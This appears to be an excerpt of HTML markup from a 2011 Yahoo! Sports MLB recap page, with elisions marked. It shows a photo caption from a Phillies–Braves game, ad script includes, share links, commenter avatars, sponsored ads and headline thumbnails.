<meta name="msapplication-task" content="name=Photos;action-uri=http://sports.yahoo.com/mlb/gallery;icon-uri=http://sports.yahoo.com/favicon.ico" />

<link rel="stylesheet" type="text/css" href="http://l.yimg.com/zz/combo?d/lib/media/phugc/mwphcom_r141.css&d/lib/yui/2.9.0/build/container/assets/skins/sam/container.css&d/lib/yui/2.9.0/build/fonts/fonts-min.css&d/lib/yui/2.9.0/build/reset/reset-min.css" />

<STYLE>
...[SNIP]...
<h2 id="yahoo-image-logo"><img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-print-logo.png" alt="Yahoo! Sports" /></h2>
...[SNIP]...
<div id="ysp-hd">

<link type='text/css' rel='stylesheet' href='http://l.yimg.com/zz/combo?kx/ucs/uh/css/215/yunivhead-min.css&kx/ucs/uh/css/221/logo-min.css&kx/ucs/search/css/180/search_all-min.css&kx/ucs/search/css/170/search_buttons-min.css'/><style>
...[SNIP]...
<div id="ad-347035" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=954x60_spon&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
<span rel="rdfs:seeAlso media:image"><img src="http://l.yimg.com/iu/api/res/1.2/aWkbF0HZtfE_Si7JPTSZuw--/YXBwaWQ9eXZpZGVvO2NoPTQ0MDtjcj0xO2N3PTM5NjtkeD0yMztkeT0xO2ZpPXVsY3JvcDtoPTIwMDtxPTcwO3c9MTgw/http://d.yimg.com/a/p/sp/ap/8c/fullj.973bbbfdd26a86f708a9677286fb4471/ap-201109052136777777842.jpg" class="photo photo0" title="Atlanta Braves starting pitcher Derek Lowe returns to the mound after Philadelphia Phillies Carlos Ruiz hit a two-run single during the fifth inning of a baseball game, Monday, Sept. 5, 2011, in Philadelphia. The Phillies won 9-0." alt="Atlanta Braves starting pitcher Derek Lowe returns to the mound after Philadelphia Phillies Carlos Ruiz hit a two-run single during the fifth inning of a baseball game, Monday, Sept. 5, 2011, in Philadelphia. The Phillies won 9-0." width="180" height="200"></span>
...[SNIP]...
<div id="ad-289494" align="center" style="padding: 0pt; margin: 0pt; border: 0pt none;"><script type="text/javascript" src="http://ads.pgatour.com/js.ng/site=ymlb&ymlb_pos=160x600_bot&ymlb_rollup=news&page.allowcompete=yes&tile=1315313419813817&transactionID=1315313419813817"></script>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-digg}-->
<a href="http://digg.com/submit?phase=2&url=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&title=Lee+tosses+another+gem%2C+shuts+out+Braves&ts=1315313420" class="digg" title="Digg.com" target="_new">digg</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-facebook}-->
<a href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122&title=Lee+tosses+another+gem%2C+shuts+out+Braves&ts=1315313420" class="facebook" title="Facebook" target="_new">add to facebook</a>
...[SNIP]...
<!--{ULT:BEGIN-SECTION;sec=foot-twitter}-->
<a href="http://twitter.com/home?status=http%3A%2F%2Fsports.yahoo.com%2Fmlb%2Frecap%3Fgid%3D310905122" class="twitter" title="Twitter" target="_new">Twitter</a>
...[SNIP]...
19/L=dddWQ2KIPE5nMaBQTmYXCQNZMhd7ak5mFwsACfgp/B=gjixMEoGYvY-/J=1315313419813817/K=pywGN4.njdLouHcchC7aSQ/A=6418146/R=0/SIG=11j13n4o5/*http://football.fantasysports.yahoo.com/f1/signup" target="_blank"><img src="http://ads.yimg.com/a/a/ya/yahoo_sports8/yahoo!_fantasy_football11_smb_630x31.jpg" alt="click here" width="630" height="31" border="0"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_YZHWC2AIHDS6QMBAYQABS3OWZ4">

<img id="com_14641418_YZHWC2AIHDS6QMBAYQABS3OWZ4" class="imageloader_classname" width="48" height="48" alt="Phillies" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4de5620eie26zws105ac4/DZRPh9E8fqjEVO9s7uRuug--/10/tn48.jpeg?ciAa60QBDxe1fC8j);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_RBTM76PODXKCIIBYWXIGYCVX24">

<img id="com_14640890_RBTM76PODXKCIIBYWXIGYCVX24" class="imageloader_classname" width="48" height="48" alt="Eric Dobson" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_TKHY2OJ4VF7WLMUTQAFZCP4JIY">

<img id="com_14640453_TKHY2OJ4VF7WLMUTQAFZCP4JIY" class="imageloader_classname" width="48" height="48" alt="Rich G" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_IAE7TUU7QJ6SMMZC66R3V7MJ2E">

<img id="com_14640404_IAE7TUU7QJ6SMMZC66R3V7MJ2E" class="imageloader_classname" width="48" height="48" alt="Bob" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_H5LPNNDS7HRHNKF3ZDRV6I56FM">

<img id="com_14640124_H5LPNNDS7HRHNKF3ZDRV6I56FM" class="imageloader_classname" width="48" height="48" alt="Yankeefanforever" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_2G6JUXLJEH3NZ5DYFZGB5MGTLY">

<img id="com_14640065_2G6JUXLJEH3NZ5DYFZGB5MGTLY" class="imageloader_classname" width="48" height="48" alt="Bruce Jones" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_WR3RHEBGYWZOPM3JPQCEQW62OM">

<img id="com_14640055_WR3RHEBGYWZOPM3JPQCEQW62OM" class="imageloader_classname" width="48" height="48" alt="Guiseppe Abdul Finklebaum" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c28ab28i43dzws118ac4/SGgVkbYjfrLWP57eyIhj.faQ_mKM17P5sA--/2/tn48.jpeg?ciAa60QB5EAUuE0V);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_WR3RHEBGYWZOPM3JPQCEQW62OM">

<img id="com_14640030_WR3RHEBGYWZOPM3JPQCEQW62OM" class="imageloader_classname" width="48" height="48" alt="Guiseppe Abdul Finklebaum" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4c28ab28i43dzws118ac4/SGgVkbYjfrLWP57eyIhj.faQ_mKM17P5sA--/2/tn48.jpeg?ciAa60QB5EAUuE0V);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_4N775ESC4JEBEYZZKFR7PE4GD4">

<img id="com_14639803_4N775ESC4JEBEYZZKFR7PE4GD4" class="imageloader_classname" width="48" height="48" alt="Steven Maurer" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_OACNIAXEMUBQ7K2VVWEW4NKYTE">

<img id="com_14639249_OACNIAXEMUBQ7K2VVWEW4NKYTE" class="imageloader_classname" width="48" height="48" alt="santi" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1KqFU_XCNAAEC_IFHfGE2DA==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_BRJGEAG4FPVDKBRJWUMTSRHX7I">

<img id="com_14638591_BRJGEAG4FPVDKBRJWUMTSRHX7I" class="imageloader_classname" width="48" height="48" alt="Brad" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_5WEO225UYYZ4CDEH4E3GANPV3U">

<img id="com_14638569_5WEO225UYYZ4CDEH4E3GANPV3U" class="imageloader_classname" width="48" height="48" alt="A Yahoo! User" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_3CXNUVR4D4YAHL32C5OSG333KA">

<img id="com_14638388_3CXNUVR4D4YAHL32C5OSG333KA" class="imageloader_classname" width="48" height="48" alt="AndrewT" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48c.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_WPNQGAGO5F5RS26J5HNEXRKB2E">

<img id="com_14638289_WPNQGAGO5F5RS26J5HNEXRKB2E" class="imageloader_classname" width="48" height="48" alt="Brandon" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6YKZ4XPZ2SEMBEVDLH7NYQMNZM">

<img id="com_14638262_6YKZ4XPZ2SEMBEVDLH7NYQMNZM" class="imageloader_classname" width="48" height="48" alt="MDDLupFNGZ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49d3ad86i1b02zul5sp1/cOZKsLIyc7QWpoP1YEZF/101/tn48.jpg?ciAa60QB7ex6jqHv);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6YKZ4XPZ2SEMBEVDLH7NYQMNZM">

<img id="com_14637976_6YKZ4XPZ2SEMBEVDLH7NYQMNZM" class="imageloader_classname" width="48" height="48" alt="MDDLupFNGZ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49d3ad86i1b02zul5sp1/cOZKsLIyc7QWpoP1YEZF/101/tn48.jpg?ciAa60QB7ex6jqHv);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6YKZ4XPZ2SEMBEVDLH7NYQMNZM">

<img id="com_14637926_6YKZ4XPZ2SEMBEVDLH7NYQMNZM" class="imageloader_classname" width="48" height="48" alt="MDDLupFNGZ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49d3ad86i1b02zul5sp1/cOZKsLIyc7QWpoP1YEZF/101/tn48.jpg?ciAa60QB7ex6jqHv);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6YKZ4XPZ2SEMBEVDLH7NYQMNZM">

<img id="com_14637887_6YKZ4XPZ2SEMBEVDLH7NYQMNZM" class="imageloader_classname" width="48" height="48" alt="MDDLupFNGZ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49d3ad86i1b02zul5sp1/cOZKsLIyc7QWpoP1YEZF/101/tn48.jpg?ciAa60QB7ex6jqHv);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_WPNQGAGO5F5RS26J5HNEXRKB2E">

<img id="com_14637815_WPNQGAGO5F5RS26J5HNEXRKB2E" class="imageloader_classname" width="48" height="48" alt="Brandon" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48a.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_PDAKJMIEDM5R3JPGNQIFS6BJJU">

<img id="com_14637735_PDAKJMIEDM5R3JPGNQIFS6BJJU" class="imageloader_classname" width="48" height="48" alt="surfinfanatic" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48d.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_6YKZ4XPZ2SEMBEVDLH7NYQMNZM">

<img id="com_14637691_6YKZ4XPZ2SEMBEVDLH7NYQMNZM" class="imageloader_classname" width="48" height="48" alt="MDDLupFNGZ" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/49d3ad86i1b02zul5sp1/cOZKsLIyc7QWpoP1YEZF/101/tn48.jpg?ciAa60QB7ex6jqHv);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VEHBTMIWD3H7M3HDUBODHHIKJM">

<img id="com_14637681_VEHBTMIWD3H7M3HDUBODHHIKJM" class="imageloader_classname" width="48" height="48" alt="douglas" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48e.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_CYDXSAUBS5VBKMDYMBOLOJWKVQ">

<img id="com_14637585_CYDXSAUBS5VBKMDYMBOLOJWKVQ" class="imageloader_classname" width="48" height="48" alt="Pippy" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://avatars.zenfs.com/users/1go9HqvajAAEC_IFHGKu4BQ==.medium.png);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_5NHXW3BNF5TFM5FVBMT4HBLEUI">

<img id="com_14637508_5NHXW3BNF5TFM5FVBMT4HBLEUI" class="imageloader_classname" width="48" height="48" alt="Shovelhead Kevin" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://a323.yahoofs.com/coreid/4e19fd53i507zul1re3/1L3momI4cKMcUeo39Kni8A--/112/tn48.jpg?ciAa60QB5mYkjgdV);"></a>
...[SNIP]...
<a href="http://pulse.yahoo.com/_VBSNH5LFJRYDKXA2CSWISKIPJI">

<img id="com_14637293_VBSNH5LFJRYDKXA2CSWISKIPJI" class="imageloader_classname" width="48" height="48" alt="gian" src="http://l.yimg.com/a/i/us/nws/2008/news/us/assets/common/images/transparent.png" style="background:url(http://l.yimg.com/a/i/identity2/profile_48b.png);"></a>
...[SNIP]...
<h4><a href="http://273961.r.msn.com/?ld=4vknDLRID0y0ISnrHi4xbf0rXsW093zomTkGicFTo0KoLaXE8aw9Kbg2PIrpo7ObkSZ9Cp-Uaj4kXeCRUTD6e-6Uc2y_KqfCEvaEaCvu19FtCAwZLjPjhJxa0tOGOSkVgx6MO-4ZYnIyouUiOqcc61Q3F1WzboMWfCIOVLn5j1RRyvIdcV1wfty1adjdaaYZJ3UQvtsKT8hITLSycZk7GX-cMcBc-VZFae_ZiCNdVdKo0DuV-rJ1XcJ3BxKRPqbVbSrApX1HwcpAtJ7kA1kG1hl2jzqm_rjbSKuTwYlVmWRPM1VAlMbFMWc4eUSNtD7tHunaxwSRAmY3M9dS-eqFM9upvz39-1D1ev1JDlLeYexRtSf7rmvK062VA">DISH.. - Official Site</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://273961.r.msn.com/?ld=4vknDLRID0y0ISnrHi4xbf0rXsW093zomTkGicFTo0KoLaXE8aw9Kbg2PIrpo7ObkSZ9Cp-Uaj4kXeCRUTD6e-6Uc2y_KqfCEvaEaCvu19FtCAwZLjPjhJxa0tOGOSkVgx6MO-4ZYnIyouUiOqcc61Q3F1WzboMWfCIOVLn5j1RRyvIdcV1wfty1adjdaaYZJ3UQvtsKT8hITLSycZk7GX-cMcBc-VZFae_ZiCNdVdKo0DuV-rJ1XcJ3BxKRPqbVbSrApX1HwcpAtJ7kA1kG1hl2jzqm_rjbSKuTwYlVmWRPM1VAlMbFMWc4eUSNtD7tHunaxwSRAmY3M9dS-eqFM9upvz39-1D1ev1JDlLeYexRtSf7rmvK062VA">DISH is the Leader in Value! Packages Start at $19.99/mo for 1yr</a></p><a href="http://273961.r.msn.com/?ld=4vknDLRID0y0ISnrHi4xbf0rXsW093zomTkGicFTo0KoLaXE8aw9Kbg2PIrpo7ObkSZ9Cp-Uaj4kXeCRUTD6e-6Uc2y_KqfCEvaEaCvu19FtCAwZLjPjhJxa0tOGOSkVgx6MO-4ZYnIyouUiOqcc61Q3F1WzboMWfCIOVLn5j1RRyvIdcV1wfty1adjdaaYZJ3UQvtsKT8hITLSycZk7GX-cMcBc-VZFae_ZiCNdVdKo0DuV-rJ1XcJ3BxKRPqbVbSrApX1HwcpAtJ7kA1kG1hl2jzqm_rjbSKuTwYlVmWRPM1VAlMbFMWc4eUSNtD7tHunaxwSRAmY3M9dS-eqFM9upvz39-1D1ev1JDlLeYexRtSf7rmvK062VA" class="iysmcm-url ysmcm-url yltasis">www.DishNetwork.com</a>
...[SNIP]...
<h4><a href="http://654834.r.msn.com/?ld=4v832-uxplxPeMk58-8EKG0L1OXm1SPBQphxosnAHdKESDXcWKlfuE5GIg_yT7e3590-ruSGxEflRKT78HERsa5PYR4FPBZuErJSFo84D99hB1yFVz9MN7V9DzGQweBo7YTxwQasnkvn5MbHI8coWHzdE1KNZmra8jXp93qka3OXKNS0SZziaIX9VTLbP1plItxr6jVxGRLo1Fc-3AnmG6_DVUCUzp_Kw4IZ4pn7_SOCtQFCmHECZjcz0o0YzMKs48Ce16sfX38fCHTHqgGsGu-VgPSmW4YlhyWA">Custom Ice Hockey Jerseys</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://654834.r.msn.com/?ld=4v832-uxplxPeMk58-8EKG0L1OXm1SPBQphxosnAHdKESDXcWKlfuE5GIg_yT7e3590-ruSGxEflRKT78HERsa5PYR4FPBZuErJSFo84D99hB1yFVz9MN7V9DzGQweBo7YTxwQasnkvn5MbHI8coWHzdE1KNZmra8jXp93qka3OXKNS0SZziaIX9VTLbP1plItxr6jVxGRLo1Fc-3AnmG6_DVUCUzp_Kw4IZ4pn7_SOCtQFCmHECZjcz0o0YzMKs48Ce16sfX38fCHTHqgGsGu-VgPSmW4YlhyWA">Design your own jersey. Quick turn around. $9.95 shipping.</a></p><a href="http://654834.r.msn.com/?ld=4v832-uxplxPeMk58-8EKG0L1OXm1SPBQphxosnAHdKESDXcWKlfuE5GIg_yT7e3590-ruSGxEflRKT78HERsa5PYR4FPBZuErJSFo84D99hB1yFVz9MN7V9DzGQweBo7YTxwQasnkvn5MbHI8coWHzdE1KNZmra8jXp93qka3OXKNS0SZziaIX9VTLbP1plItxr6jVxGRLo1Fc-3AnmG6_DVUCUzp_Kw4IZ4pn7_SOCtQFCmHECZjcz0o0YzMKs48Ce16sfX38fCHTHqgGsGu-VgPSmW4YlhyWA" class="iysmcm-url ysmcm-url yltasis">Ijerseys.com</a>
...[SNIP]...
<h4><a href="http://292227.r.msn.com/?ld=4vvEpu9FGOv8kjayMK52c9SOdCtKcHTXIlcsLVRx6YEYH4wXNOxEntCOPOa-XsHcHpMwr9v9QdECw7xX5MK0Qg10ZCZtpZvWAaod8PP3p-uYzvxBpNnPRXROBy8R9RTL2JopWyRmc4T_Yd1baqWLpVRA8TemH6Ma7_QyRHdPqTugAf4DXSPnt6KiNu_eX4Xe2vqoGrCAAwRXyDch2d-JUZH20dNSFI5VolxXmRYeLj3YEZANhEZx-9PCKckC_gMHKOeo1AXzxLlrkRQUeCRYuX_5F4xX1CHXI-BDknOCeDsLw1VAlMBPgXo-O8cyWfSrWNodN-7xAmY3M9piQT_xnzSerQ6V2IkwZsvGKcq4p22Zm1wZ4pMCDgZZA">The 9mm is No Defense</a>
...[SNIP]...
<p class="iysmcm-desc ysmcm-desc"><a href="http://292227.r.msn.com/?ld=4vvEpu9FGOv8kjayMK52c9SOdCtKcHTXIlcsLVRx6YEYH4wXNOxEntCOPOa-XsHcHpMwr9v9QdECw7xX5MK0Qg10ZCZtpZvWAaod8PP3p-uYzvxBpNnPRXROBy8R9RTL2JopWyRmc4T_Yd1baqWLpVRA8TemH6Ma7_QyRHdPqTugAf4DXSPnt6KiNu_eX4Xe2vqoGrCAAwRXyDch2d-JUZH20dNSFI5VolxXmRYeLj3YEZANhEZx-9PCKckC_gMHKOeo1AXzxLlrkRQUeCRYuX_5F4xX1CHXI-BDknOCeDsLw1VAlMBPgXo-O8cyWfSrWNodN-7xAmY3M9piQT_xnzSerQ6V2IkwZsvGKcq4p22Zm1wZ4pMCDgZZA">Discover What Military Operatives & The Army Don't Want You To Know</a></p><a href="http://292227.r.msn.com/?ld=4vvEpu9FGOv8kjayMK52c9SOdCtKcHTXIlcsLVRx6YEYH4wXNOxEntCOPOa-XsHcHpMwr9v9QdECw7xX5MK0Qg10ZCZtpZvWAaod8PP3p-uYzvxBpNnPRXROBy8R9RTL2JopWyRmc4T_Yd1baqWLpVRA8TemH6Ma7_QyRHdPqTugAf4DXSPnt6KiNu_eX4Xe2vqoGrCAAwRXyDch2d-JUZH20dNSFI5VolxXmRYeLj3YEZANhEZx-9PCKckC_gMHKOeo1AXzxLlrkRQUeCRYuX_5F4xX1CHXI-BDknOCeDsLw1VAlMBPgXo-O8cyWfSrWNodN-7xAmY3M9piQT_xnzSerQ6V2IkwZsvGKcq4p22Zm1wZ4pMCDgZZA" class="iysmcm-url ysmcm-url yltasis">www.CloseCombatTraining.com</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905103&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Angels pull within 2 1/2 of AL West lead">
<img src="http://l.yimg.com/iu/api/res/1.2/GzbkxFadt4WfIdG9l_2hLA--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/25/fullj.96be702fc132c65f2755dfdfa412a18b/ap-201109052257826217930.jpg" title="Angels pull within 2 1/2 of AL West lead" alt="Angels pull within 2 1/2 of AL West lead" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905309&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="ChiSox top Twins in doubleheader opener">
<img src="http://l.yimg.com/iu/api/res/1.2/fi9QJ.vXznMRNDzx0sBOXA--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/a1/fullj.546acc66daeb9e7141ce9cf5ba1431cf/ap-201109052227808307879.jpg" title="ChiSox top Twins in doubleheader opener" alt="ChiSox top Twins in doubleheader opener" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905127&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Surging Diamondbacks get by Rockies 10-7">
<img src="http://l.yimg.com/iu/api/res/1.2/ZiWO3Illellx7JMSwZY8Og--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/6d/fullj.f8ab4adb809657eb152de69cc8370238/ap-201109051727628397256.jpg" title="Surging Diamondbacks get by Rockies 10-7" alt="Surging Diamondbacks get by Rockies 10-7" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905114&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Red Sox lose Beckett, fall to Jays in 11">
<img src="http://l.yimg.com/iu/api/res/1.2/w9xkk_1GG5CupyMTSRVjNg--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/b2/fullj.5b15e818a420c2837e316fcc4a52b935/ap-201109051659611587164.jpg" title="Red Sox lose Beckett, fall to Jays in 11" alt="Red Sox lose Beckett, fall to Jays in 11" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905124&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Brewers extend lead to 10 1/2 over Cards">
<img src="http://l.yimg.com/iu/api/res/1.2/SOaB0bEUCpO7FKyQaoriaw--/YXBwaWQ9eXZpZGVvO2NoPTM1Nztjcj0xO2N3PTUzMztkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/getty/32/fullj.82525a300850c649d9093dff28e6a306/82525a300850c649d9093dff28e6a306-getty-123911491.jpg" title="Brewers extend lead to 10 1/2 over Cards" alt="Brewers extend lead to 10 1/2 over Cards" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905125&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Sandoval homers twice in Giants' 7-2 win">
<img src="http://l.yimg.com/iu/api/res/1.2/8fwnNkyywVzZDNuaBjezyA--/YXBwaWQ9eXZpZGVvO2NoPTM5Njtjcj0xO2N3PTU5MTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/getty/7d/fullj.c04ebb876843737efc9f061ae712f065/c04ebb876843737efc9f061ae712f065-getty-123911427.jpg" title="Sandoval homers twice in Giants' 7-2 win" alt="Sandoval homers twice in Giants' 7-2 win" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905110&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Montero has 2 HRs, Yankees push run to 5">
<img src="http://l.yimg.com/iu/api/res/1.2/Y6vrxqDP8Wm.I69wyKNEPw--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/d9/fullj.db8102818e5c015d6f2aeb8b530de787/ap-201109051630594487073.jpg" title="Montero has 2 HRs, Yankees push run to 5" alt="Montero has 2 HRs, Yankees push run to 5" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905130&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Rays' Shields throws 11th complete game">
<img src="http://l.yimg.com/iu/api/res/1.2/2ct.u1FzgQk4NLWhuCmiXA--/YXBwaWQ9eXZpZGVvO2NoPTM4OTtjcj0xO2N3PTU4MTtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/getty/57/fullj.220b08593d0c794d15d61f9eca0ca01a/220b08593d0c794d15d61f9eca0ca01a-getty-123907852.jpg" title="Rays' Shields throws 11th complete game" alt="Rays' Shields throws 11th complete game" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905105&active_dimension=carousel_mlb_top_headlines&ysp_frm_woah=1" title="Fister Ks 13 as Tigers up lead to 7 1/2">
<img src="http://l.yimg.com/iu/api/res/1.2/G5zcHDXpKMCS87kyEFOwCg--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/f8/fullj.589aef2f7e4fcda1cc4bfa84760e211a/ap-201109051459539846804.jpg" title="Fister Ks 13 as Tigers up lead to 7 1/2" alt="Fister Ks 13 as Tigers up lead to 7 1/2" width="94" height="63">
</a>
...[SNIP]...
<a href="http://rivals.yahoo.com/ncaaf/news?slug=ap-miami&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Undermanned Miami drops opener to Terps">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/mlb/recap?gid=310905103&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Angels pull within 2 1/2 of AL West lead">
<img src="http://l.yimg.com/iu/api/res/1.2/GzbkxFadt4WfIdG9l_2hLA--/YXBwaWQ9eXZpZGVvO2NoPTI5NDtjcj0xO2N3PTQ0MDtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NjM7cT0xMDA7dz05NA--/http://d.yimg.com/a/p/sp/ap/25/fullj.96be702fc132c65f2755dfdfa412a18b/ap-201109052257826217930.jpg" title="Angels pull within 2 1/2 of AL West lead" alt="Angels pull within 2 1/2 of AL West lead" width="94" height="63">
</a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/news?slug=ap-redskins-qb&active_dimension=carousel_top_top_headlines&ysp_frm_woah=1" title="Grossman win Redskins QB job over Beck">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
